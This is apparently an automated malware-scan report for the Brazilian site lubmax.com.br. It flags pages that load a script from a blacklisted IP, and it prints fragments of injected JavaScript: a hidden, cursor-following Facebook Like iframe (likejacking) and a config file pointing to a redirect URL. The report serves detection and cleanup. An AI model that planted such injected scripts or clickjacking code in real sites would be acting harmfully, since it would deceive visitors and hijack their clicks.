Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lubmax.com.br
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.lubmax.com.br/ | 200 OK Content-Length: 14003 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 210.56.8.72 ...[4423 bytes skipped]... lt;a href="http://www.carbono14.com.br" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','imagens/logo14under.png',1)"><img src="imagens/logo14.png" name="Image12" width="78" height="15" border="0" /></a></div></div> </div> </div> <script language='javascript' src='like.js'></script><script type='text/javascript' src='http://210.56.8.72/init.js'></script></body> </html> | ||
http://www.lubmax.com.br/js/jquery-1.6.4.min.js | 200 OK Content-Length: 91669 Content-Type: application/javascript | clean |
http://www.lubmax.com.br/config.js | 200 OK Content-Length: 107 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var fan_page_url = 'http://www.produvideo.net/VideoRedir/video.php'
var opacity = 0.0; var time = 40000; Antivirus reports:
| ||
http://www.lubmax.com.br/js/easySlider1.7.js | 200 OK Content-Length: 5988 Content-Type: application/javascript | clean |
http://www.lubmax.com.br/like.js | 200 OK Content-Length: 2639 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if((document.getElementById) && window.addEventListener || window.attachEvent){
(function(){ var hairCol = "#000000"; var d = document; var my = -10; var mx = -10; var r; var vert = ""; var idx = document.getElementsByTagName('div').length; var thehairs = "<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href=" + encodeURIComponent setTimeout(ani, 300); } function init(){ vert = document.getElementById("theiframe").style; ani(); } if (window.addEventListener){ window.addEventListener("load",init,false); document.addEventListener("mousemove",mouse,false); } else if (window.attachEvent){ window.attachEvent("onload",init); document.attachEvent("onmousemove",mouse); } })(); } Antivirus reports:
| ||
http://210.56.8.72/init.js | 200 OK Content-Length: 7840 Content-Type: application/x-javascript | clean |
http://www.lubmax.com.br/index.php | 200 OK Content-Length: 14003 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 210.56.8.72 ...[4423 bytes skipped]... lt;a href="http://www.carbono14.com.br" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','imagens/logo14under.png',1)"><img src="imagens/logo14.png" name="Image12" width="78" height="15" border="0" /></a></div></div> </div> </div> <script language='javascript' src='like.js'></script><script type='text/javascript' src='http://210.56.8.72/init.js'></script></body> </html> | ||
http://www.lubmax.com.br/faleconosco.php | 200 OK Content-Length: 16637 Content-Type: text/html | clean |
http://www.lubmax.com.br/js/ajax.js | 200 OK Content-Length: 16778 Content-Type: application/javascript | clean |
http://www.lubmax.com.br/js/jquery.maskedinput-1.2.1.js | 200 OK Content-Length: 7730 Content-Type: application/javascript | clean |
http://www.lubmax.com.br/js/easing.jquery.js | 200 OK Content-Length: 8100 Content-Type: application/javascript | clean |
http://www.lubmax.com.br/trabalheconosco.php | 200 OK Content-Length: 15872 Content-Type: text/html | clean |
http://www.lubmax.com.br/noticias.php | 200 OK Content-Length: 14493 Content-Type: text/html | clean |
http://www.lubmax.com.br/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lubmax.com.br
Result:
GET / HTTP/1.1
Host: lubmax.com.br
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: lubmax.com.br
Referer: http://www.google.com/search?q=lubmax.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lubmax.com.br
Referer: http://www.google.com/search?q=lubmax.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.